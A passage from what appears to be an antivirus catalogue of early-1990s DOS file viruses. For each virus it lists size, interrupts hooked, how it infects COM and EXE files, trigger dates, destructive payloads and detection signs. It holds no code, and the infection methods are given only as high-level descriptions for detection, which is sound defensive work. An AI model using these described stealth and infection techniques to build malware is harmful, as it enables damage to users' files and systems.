hanged.
Detection method: Infected files increase by 416 bytes.
[Ash-B]
Virus Name: Ash-B
Virus Type: File Virus (COM files)
Virus Length: 280 bytes
Execution Procedure:
The virus searches for all uninfected COM files on the current
directory, then infects them.
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 280 bytes.
[Scribble]
Virus Name: Scribble
Virus Type: File Virus (COM and EXE files)
Virus Length:
Execution Procedure:
The virus searches for all uninfected COM and EXE files on the
current directory, then infects them.
Damage: It overwrites the original files with the virus code, thus
corrupting the files.
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
[Simple 1992]
Virus Name: Simple-1992
Virus Type: File Virus (COM files)
Virus Length: 424 bytes
Execution Procedure:
The virus searches for all uninfected COM files on the current
directory, then infects them. (Virus will also infect COMMAND.COM.)
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 424 bytes.
[Schrunch]
Virus Name: Schrunch
Virus Type: File Virus (COM files)
Virus Length: 420 bytes
Execution Procedure:
The virus displays the following message:
"S C H R U N CH E M U P T I M E."
The virus then searches for all uninfected COM files on the current
directory, then proceeds to infect them.
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method:
1) Infected files increase by 420 bytes.
2) The virus displays the above message when an infected file is
executed.
[CV4]
Virus Name: Cv4
Virus Type: File Virus (COM files)
Virus Length: 321 bytes
Execution Procedure:
The virus displays the following message:
"This file infected with COMVIRUS 1.0."
The virus then searches for an uninfected COM file on the current
directory and proceeds to infect it (only infects one file at a
time).
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method:
1) Infected files increase by 321 bytes.
2) The virus displays the above message when an infected file is
executed.
[Arcv-3A]
Virus Name: Arcv-3a
Virus Type: File Virus (COM files)
Virus Length: 657 bytes
Execution Procedure:
1) Searches for all uninfected COM files on the current directory,
then infects them.
2) Checks whether the current calendar month is February. If it is, the
virus displays the following:
"I've just Found a Virus.. Oops.. Sorry I'm the virus...Well
let me introduce myself.. I am ARCV-3 Virus, by Apache
Warrior... Long Live The ARCV and What s an Hard ECU?.. Vote
Yes to the Best Vote ARCV..."
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 657 bytes.
[Anti_Daf]
Virus Name: Anti_Daf
Virus Type: File Virus (COM files)
Virus Length: 561 bytes
Execution Procedure:
1) Searches for an uninfected COM file on the current directory,
then infects it (only infects one file at a time).
2) Checks whether the current month is November, and the current day
is Monday. If these conditions are met, the virus displays the
message below, and then destroys all data on the hard disk.
"The Anti_Daf virus.. DAF-TRUCKSE indhoven.. Hugo vd Goeslaan
1..postbus 90063..6500 PREindhoven, The Netherlands. .. DAF
sucks..... (c) 1992 Dark Helmet & The Virus Research Centre"
Damage: The virus sometimes destroys all data on the hard disk.
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 561 bytes.
[Manola]
Virus Name: Manola
Virus Type: File Virus (COM files)
Virus Length: 831 bytes
Execution Procedure:
The virus checks whether the current day is 7. If it is, the virus
displays the following message and then reboots the system:
"The Atomic Dustbin 2B - I'm Here To Stay".
If the above condition is not met, the virus searches for an
uninfected COM file on the current directory, then infects it (infects
only one file at a time).
Damage: The virus sometimes reboots the system.
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 831 bytes.
[Seneca-A]
Virus Name: Seneca-A
Virus Type: File Virus (EXE files)
Virus Length:
Execution Procedure:
1) Searches for all uninfected EXE files on the current directory,
then infects them.
2) Checks whether the current date is November 25. If it is, the virus
displays the following message and then destroys all data on the
hard disk:
"Its Seneca's B_DAY
let's party !!!"
Damage: The virus sometimes destroys all data on the hard disk.
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
[Seneca-B]
Virus Name: SENECA-B
Virus Type: File Virus
Virus Length:
Execution Procedure:
1) Searches for all (*.*) uninfected files on the current directory,
then infects them.
2) Checks whether the current date is November 25. If it is, the virus
displays the following message and then destroys all data on the
hard disk:
"Its Seneca's B_DAY
let's party !!!"
Damage: The virus sometimes destroys all data on the hard disk.
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
[Mog]
Virus Name: Mog
Virus Type: File Virus (COM files)
Virus Length: 328 bytes
Execution Procedure:
1) The virus searches for all uninfected COM files on the current
directory, then infects them. The virus then displays the
following message:
" Maccabi Yafo !!!!!"
2) Checks whether the current date is February 25. If it is, the virus
halts the system.
Damage: The virus sometimes halts the system.
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 328 bytes.
[LZ2]
Virus Name: Lz2
Virus Type: File Virus (EXE files)
Virus Length: 3000-8000 bytes
Execution Procedure:
The virus searches for an uninfected EXE file on the current directory,
then infects it (only infects one file at a time). The method of
infection is: it creates a new COM file with the same name as the
EXE file. This new COM file is the virus. Its length is 3000-8000 bytes.
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
3) The procedure at the beginning of the virus is encrypted in LZEXE
mode. PCSCAN cannot scan this virus.
[Silver-3D]
Virus Name: Silver-3d
Virus Type: File Virus (COM and EXE files)
Virus Length:
Execution Procedure:
The virus searches for an uninfected COM or EXE file on the current
directory, then infects it (infects four files at a time).
The virus then displays the following message:
"Program too big to fit in memory."
Damage:
1) It overwrites the original files with the virus code, thus
corrupting the files.
2) If the virus cannot find an uninfected file, it will display "PLO
VIRUS RESEARCH TEAM" in enlarged font. The virus then halts the
system.
Detection method:
1) The length of infected COM files is 8101 bytes.
2) Executed infected files will display the following message:
"Program too big to fit in memory" or
"PLO VIRUS RESEARCH TEAM."
[Silly-Willy]
Virus Name: Silly-Willy
Virus Type: File Virus (COM and EXE files)
Virus Length:
Execution Procedure:
1) When executing an infected COM program, it will infect files
only when the current year is between 1988 and 1992. When
infecting files, the virus will search for an uninfected COM and
EXE files on the current directory, then infects them. The virus
will only infect one COM file and EXE file at a time.
2) Executing an infected EXE program will not infect other files.
At this time, a smiling face is displayed on the screen
Furthermore, when any key is depressed, the following message
will be displayed:
"Hello ! I'm Silly-Willy
Now, I'm formatting your HARDDISK.........."
(It does not really format the hard disk). If there is a diskette
in drive A, all data on this diskette will be destroyed and the
virus will proceed to hang the system.
Damage: The virus sometimes destroys all data on the diskette in
drive A and halts the system.
[Stupid 1]
Virus Name: Stupid 1, July 4
Virus Type: File Virus (COM files)
Virus Length: 743 bytes
Execution Procedure:
1) If the word at address 0000:01FEh is FFFFh, the virus will not
infect any file.
2) When the virus infects files, it will infect all uninfected COM
files on the current directory. If the number of infection is less
than 2, it will go on infecting all COM files on the upper
directory until the number is larger than 2 or it has reached
the root directory. It will check whether the current date is July 4
and current time is 0:00am, 1:00am, 2:00am, 3:00am, 4:00am, or
5:00am. If these conditions are met, the virus will proceed to
destroy data on the current diskette.
Detection method:
1) Date and time fields of infected files are changed.
2) Byte at 0003h of an infected COM file is 1Ah.
3) Infected COM file displays the following message:
"Abort, Retry, Ignore, Fail?" ,
"Fail on INT 24"
(2) - "Impotence error reading users disk"
(0) - "Program too big to fit in memory"
(1) - "Cannot load COMMAND, system halted"
(3)"Joker!" and "*.com."
4) The virus displays the above message when executing an
infected file.
[Klf-356]
Virus Name: Klf-356
Virus Type: File Virus (COM files)
Virus Length: 356 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 356 bytes.
[April 998]
Virus Name: April 998
Virus Type: File Virus
Virus infects .EXE files which are greater than 10h.
Virus is a memory resident.
Virus Length: 998 bytes (file), 1104 bytes (memory)
PC Vectors Hooked: INT 21h
Infection Process: This virus is spread by executing an infected
program. When an April, 1998 infected program is executed, it will
check to see if it already resident in the memory. If so, it will
execute the infected program. The virus stays resident at the top of
the MCB (memory control block) but below the DOS 640k boundary.
Damage: Virus writes garbage to the C drive from relative sector 0 to
sector Feh when the system date is April of any year.
Symptoms: The available free memory will decrease by 1104 bytes.
Note: This virus doesn't infect files named: "SCAN*", "CLEA*",
"VIRS*","F-PR*" OR "CPAV*"
[17-768]
Virus Name: 17-768
Virus Type: File Virus
Virus infects .COM and .EXE files shorter than 59920
bytes. Memory resident.
Virus Length: 768 (300h) bytes (file), 800 (320h) bytes (memory)
PC Vectors Hooked: INT 09h, INT 21h
Infection Process: This virus is a variant of the November-17th
virus: If the system date is equal to 17 November, and the value
of [40:46E] is not the same as the virus backup value of [40:46E]
when the virus is resident, it will destroy the current disk beginning
from sector 1 to sector 8. The first time a program infected
with November 17th is executed, the virus will install itself
memory resident at the top of the system memory but below the 640K
DOS boundary.
Damage: Virus destroys the current disk from sector 1 to sector 8. By
progressive action, the virus will insert garbage in these sectors
when the date is the 17th of November.
Symptoms: File size increase of 855 bytes. Available free memory
decreases by 896 bytes.
Note: The November 17th virus was detected in January, 1992. Its
origin or point of original isolation was originally unknown, but
it has since been reported as being widespread in Rome, Italy in
December, 1991. November 17th is a memory resident infector of
.COM and .EXE programs, including COMMAND.COM.
[Jeff]
Virus Name: Jeff
Virus Type: File Virus (COM files)
Virus Length: 815-820 bytes
Execution Procedure:
The virus searches for an uninfected COM file on the current directory,
then infects it. It only infects one file at a time.
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 815-820 bytes.
[Ill]
Virus Name: Ill
Virus Type: File Virus (COM files)
Virus Length: 1016 bytes
Execution Procedure:
The virus searches for an uninfected COM file on the current directory,
then infects it. It only infects one file at a time.
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 1016 bytes.
[Iero-512-560]
Virus Name: Iero-512-560
Virus Type: File Virus (COM files)
Virus Length: 512 or 560 bytes
PC Vectors Hooked: INT 21h, INT 08h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM file, the virus proceeds to infect it.
2) Hooks INT 08h to check the current time. At some random point in
time, it will display the following message:
"Mulier pulchr aest janua diab oli , .. via iniq uitatis,
scorpion is percussio. .St. Ieronim.."
Damage: None
Note:
1) An error message appears when writing because INT 24h has not been
hanged.
2) While the virus is memory resident, the available memory decreases
by 1. You can check this by using MEM.EXE.
Detection method: Infected files increase by 512 or 560 bytes.
[Iernim]
Virus Name: Iernim
Virus Type: File Virus (COM files)
Virus Length: 570 or 600 bytes
PC Vectors Hooked: INT 21h, INT 08h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM file, the virus proceeds to infect it.
2) Hooks INT 08h to check the current time. At some random point in
time, it will display the following message:
"Mulier pulchra est janua diaboli , .. via iniquitatis,
scorpionis percussio ..St. Ieronim.."
Damage: None
Note:
1) An error message appears when writing because INT 24h has not been
hanged.
2) While the virus is memory resident, the available memory decreases
by 1. You can check this by using MEM.EXE.
Detection method: Infected files increase by 570 or 600 bytes.
[Horror]
Virus Name: Horror
Virus Type: File Virus (COM and EXE files)
Virus Length: 1112-1182 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h.
3) Checks whether COMMAND.COM that booted up the system is infected
or not. If not, the virus infects it and goes back to original
routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM or EXE file, the virus proceeds to
infect it.
Damage: It destroys all data on the hard disk (Every variant of
the virus has its own infection time).
Note: The Soft-mice software is destroyed by infected EXE programs.
Detection method: Infected files increase by 1112-1182 bytes.
[I-B]
Virus Name: I-B
Virus Type: File Virus (COM files)
Virus Length:
Execution Procedure:
The virus searches for all uninfected COM files on all directories,
and infects them. No matter whether it has infected a file or not,
this virus will check whether the current day is Monday. If it is,
the virus proceeds to destroy all data on the hard disk.
Damage:
1) It sometimes destroys all data on the hard disk.
2) It overwrites the original files with the virus code, thus
corrupting the files.
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
[Cr-2480b]
Virus Name: Cr-2480b
Virus Type: File Virus (COM files)
Virus Length: 2480 bytes
Execution Procedure:
The virus searches for an uninfected COM file on the current directory,
then infects it (It only infects one file at a time).
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 2480 bytes.
[Md-354]
Virus Name: Md-354
Virus Type: File Virus (COM files)
Virus Length: 354 bytes
Execution Procedure:
The virus searches for an uninfected COM file on the current directory,
then infects it (It only infects one file at a time).
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 354 bytes.
[Los-693]
Virus Name: Los-693
Virus Type: File Virus (COM files)
Virus Length: 693 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H (AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM file, the virus proceeds to infect it.
Damage:
There is a virus flag in the partition (initial value is zero).
The value will increase by 1 every time the virus infects a file. When
this flag is larger than 223, the virus hooks INT 08h. One minute later,
characters will start to fall down on the screen. The virus then halts
the system.
Detection method: Infected files increase by 693 bytes.
[Bung1422]
Virus Name: Bung1422
Virus Type: File Virus (COM files)
Virus Length: 1442 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
3) Checks whether the current date is September 20. If it is, the virus
displays the following message:
"Jonhan Bonhn - September 20 1980
- L E D Z E P P E L I N -"
Infection Procedure:
1) Hooks INT 21H(AH=4Bh). First, it hangs INT 24h to prevent divulging
its trace when writing. If the program to be executed is an
uninfected COM file, the virus infects it directly. If the program
to be executed is an EXE file, it will search for an uninfected COM
file and infect it. Lastly, the virus restores INT 24h.
Damage: None
Detection method: Infected files increase by 1422 bytes.
[Src-377]
Virus Name: Src-377
Virus Type: File Virus (COM files)
Virus Length: 377 bytes
Execution Procedure:
The virus searches for all uninfected COM files on all directories,
and proceeds to infect them.
Damage:
If the hard disk is divided into more than one partition, and the
system is booted up from the second partition (D drive), all data on
this drive will be corrupted.
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 377 bytes.
[Mini-195]
Virus Name: Mini-195
Virus Type: File Virus (COM files)
Virus Length: 195 or 218 bytes
Execution Procedure:
The virus searches for an uninfected #*.COM file ("#" indicates a
character from 'A' to 'Z', like A*.com, F*.COM, X*.COM) on the
current directory, and infects it.
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 195 or 218 bytes.
[Gold]
Virus Name: Gold
Virus Type: File Virus (COM and EXE files)
Virus Length: 612 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM or EXE file, the virus proceeds to infect it.
After it has infected the file, the virus has a 50% chance of going
back to the original routine. The other possibility is for the virus
to display random characters and end without executing the original
routine.
Damage: None
Note: An error message appears when writing because INT 24h has not
been hanged.
Detection method: Infected files increase by 612 bytes.
[Hard-Day]
Virus Name: Hard-Day
Virus Type: File Virus (COM files)
Virus Length: 662 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM file, the virus proceeds to infect it.
Damage:
If the current calendar day is Monday and current time is 18:00 later,
the virus halts the system after displaying the following message:
"Hard day's night !"
Note: An error message appears when writing because INT 24h has not
been hanged.
Detection method: Infected files increase by 662 bytes.
[In83-584]
Virus Name: In83-584
Virus Type: File Virus (COM files)
Virus Length: 584 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 584 bytes.
[Tankard]
Virus Name: Tankard
Virus Type: File Virus (COM files)
Virus Length: 493 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H (AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 493 bytes.
[1241]
Virus Name: 1241
Virus Type: File Virus (COM and EXE files)
Virus Length: 1560-1570 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
The virus checks whether the current calendar date is later than
November 13, 1990. If it is, the virus displays the following message:
"St Cruz, Dili, 1991 Nov 12.
Lusitania Expresso,
Freedom for East Timor !"
Then reboots the system. Otherwise, it will check whether it is memory
resident. If not, it loads itself resident in the high memory. Then
hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be
executed is an uninfected COM or EXE file, the virus proceeds to
infect it.
Damage: None
Detection method: Infected files increase by 1560-1570 bytes.
[104]
Virus Name: 104
Virus Type: File Virus (COM files)
Virus Length: 400 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Note: An error message appears when writing because INT 24h has not
been hanged.
Detection method: Infected files increase by 400 bytes.
[Trident]
Virus Name: Trident
Virus Type: File Virus (COM and EXE files)
Virus Length: 2385-2395 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing.
2) Checks whether the DIR command is used (e.g., DIR H*.*). If so, all
uninfected COM and EXE files accessed by this command get infected.
Damage: None
Detection method: Infected files increase by 2385-2395 bytes.
[Explode]
Virus Name: Explode
Virus Type: File Virus (COM files)
Virus Length:
Execution Procedure:
1) Searches for all uninfected COM files on the current directory,
then proceeds to infect them.
2) Checks whether the current month is April or May. If it is, the
virus displays the following message:
"Your hard drive is about to explode !"
The virus then destroys all data on the hard disk. If the calendar
shows months other than April and May, the virus displays:
"Program too big to fit in memory."
Damage:
1) It sometimes destroys all data on the hard disk.
2) It overwrites the original files with the virus code, thus
corrupting the files.
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
[End-Of]
Virus Name: End-Of
Virus Type: File Virus (COM files)
Virus Length: 783 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=3Bh) to infect files. When accessing other
directories, all uninfected COM files on the original directory
will be infected.
Damage: None
Note: An error message appears when writing because INT 24h has not
been hanged.
Detection method: Infected files increase by 783 bytes.
[Copyr-Ug]
Virus Name: Copyr-Ug
Virus Type: File Virus (COM and EXE files)
Virus Length: 766 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be
executed is an uninfected COM or EXE file, the virus proceeds to
infect it.
Damage: None
Note: An error message appears when writing because INT 24h has not
been hanged.
Detection method: Infected files increase by 766 bytes.
[Chuang]
Virus Name: Chuang
Virus Type: File Virus (COM and EXE files)
Virus Length: 970 bytes
Execution Procedure:
1) Searches for an uninfected COM file on the current directory,
then infects it (It only infects one file at a time).
2) Checks whether the current calendar day is later than 12, and
current time is 22:00 or later. If these conditions are met,
the virus destroys all data on the hard disk.
Damage: The virus sometimes destroys all data on the hard disk.
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 970 bytes.
[Ancient]
Virus Name: Ancient
Virus Type: File Virus (COM files)
Virus Length: 783 bytes
Execution Procedure:
1) Searches for an uninfected COM file on the current directory,
then infects it (It only infects one file at a time).
2) Cleans the screen or displays various colors of ' * ' until a
key is depressed. At that time, a strange sound will emit for
approximately 5 minutes. After which, the virus will return to the
original program.
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
3) Reinfects files.
Detection method: Infected files increase by 783 bytes.
[Adolf_Hitler]
Virus Name: Adolf_Hitler
Virus Type: File Virus (COM files)
Virus Length: 475 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 475 bytes.
[Fob]
Virus Name: Fob
Virus Type: File Virus (COM files)
Virus Length: 1750-1950 bytes
Execution Procedure:
1) Searches for an uninfected COM file on the current directory,
then infects it (only infects one file at a time). There is a
50% chance that the virus will display a message asking the user
to input the following word: "SLOVAKIA." The virus will wait
until the user inputs this word and will proceed to terminate the
program.
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files will ask user to input the word
"SLOVAKIA," and will not end until the user has done so.
[Signs]
Virus Name: Signs
Virus Type: File Virus (COM files)
Virus Length: 720 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
3) Checks whether the current calendar day is Friday. If it is, the
screen will roll up once a minute.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 720 bytes.
[Shield]
Virus Name: Shield
Virus Type: File Virus (COM files)
Virus Length: 172 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Note:
1) An error message appears when writing because INT 24h has not been
hanged.
2) The function of the infected program is different from the
original. Infected files have no ability to infect other
files. But they can display a message when the current month is
February. The message reads:
"I greet you user .
I am COM-CHILD, son of The Breeder Virus.
Look out for the RENAME-PROBLEM !"
Detection method: Infected files increase by 172 bytes.
[Wishes]
Virus Name: Wishes
Virus Type: File Virus (COM and EXE files)
Virus Length: 970 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
3) Checks whether the current calendar day is 13, Friday. If it is,
the virus proceeds to destroy all data on the hard disk.
Infection Procedure:
1) Hooks INT 21H (AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM or EXE file, the virus proceeds to
infect it.
Damage: The virus sometimes destroys all data on the hard disk.
Detection method: Infected files increase by 970 bytes.
[439]
Virus Name: 439
Virus Type: File Virus (COM files)
Virus Length: 439 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 439 bytes.
[4-A]
Virus Name: 4-A
Virus Type: File Virus (COM files)
Virus Length: 450-460 bytes
Execution Procedure:
The virus displays the following message:
"-----Hello , I am virus ! -----".
The virus then searches for an uninfected COM file on the current
directory and infects it (It only infects one file at a time).
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method:
1) Infected files display above message when executed.
2) Infected files increase by 450-460 bytes.
[330]
Virus Name: 330
Virus Type: File Virus (COM files)
Virus Length: 330 bytes
Execution Procedure:
1) Searches for an uninfected COM file on the current directory
and infects it (It only infects one file at a time).
2) Checks whether the current month is July. If it is, the virus
displays the following message:
"[330] by ICE-9."
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 330 bytes.
[203]
Virus Name: 203
Virus Type: File Virus (COM files)
Virus Length: 203 bytes
Execution Procedure:
The virus searches for an uninfected COM file on the current directory,
then infects it (It only infects one file at a time).
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 203 bytes.
[Mr-Vir]
Virus Name: Mr-Vir
Virus Type: File Virus (COM files)
Virus Length: 508 bytes
Execution Procedure:
The virus searches for an uninfected COM file on the current directory,
then infects it (It only infects one file at a time).
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 508 bytes.
[Nazgul]
Virus Name: Nazgul
Virus Type: File Virus (COM files)
Virus Length: 266 bytes
Execution Procedure:
Virus searches for all uninfected COM files on the current directory,
then infects them.
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 266 bytes.
[Napc]
Virus Name: Napc
Virus Type: File Virus (COM and EXE files)
Virus Length: 729 bytes
Execution Procedure:
Virus searches for all uninfected COM and EXE files on the current
directory, then proceeds to infect them.
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 729 bytes.
[Little]
Virus Name: Little
Virus Type: File Virus (COM files)
Virus Length: 665 bytes
Execution Procedure:
Virus searches for an uninfected COM file on the current directory,
then infects it (It only infects one file at a time).
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 665 bytes.
[Atte-629]
Virus Name: Atte-629
Virus Type: File Virus (COM files)
Virus Length: 629 bytes
Execution Procedure:
Virus searches for an uninfected COM file on the current directory,
then infects it (It only infects one file at a time).
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 629 bytes.
[A&A]
Virus Name: A&A
Virus Type: File Virus (COM files)
Virus Length: 506 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 506 bytes.
[Magnitogorski-3]
Virus Name: Magnitogorski-3
Virus Type: File Virus (COM and EXE files)
Virus Length: 3000 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM or EXE file, the virus proceeds to
infect it.
Damage: None
Detection method: Infected files increase by 3000 bytes.
[Lpt-Off]
Virus Name: Lpt-Off
Virus Type: File Virus (COM files)
Virus Length: 256 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be
executed is an uninfected COM file, the virus proceeds to infect it.
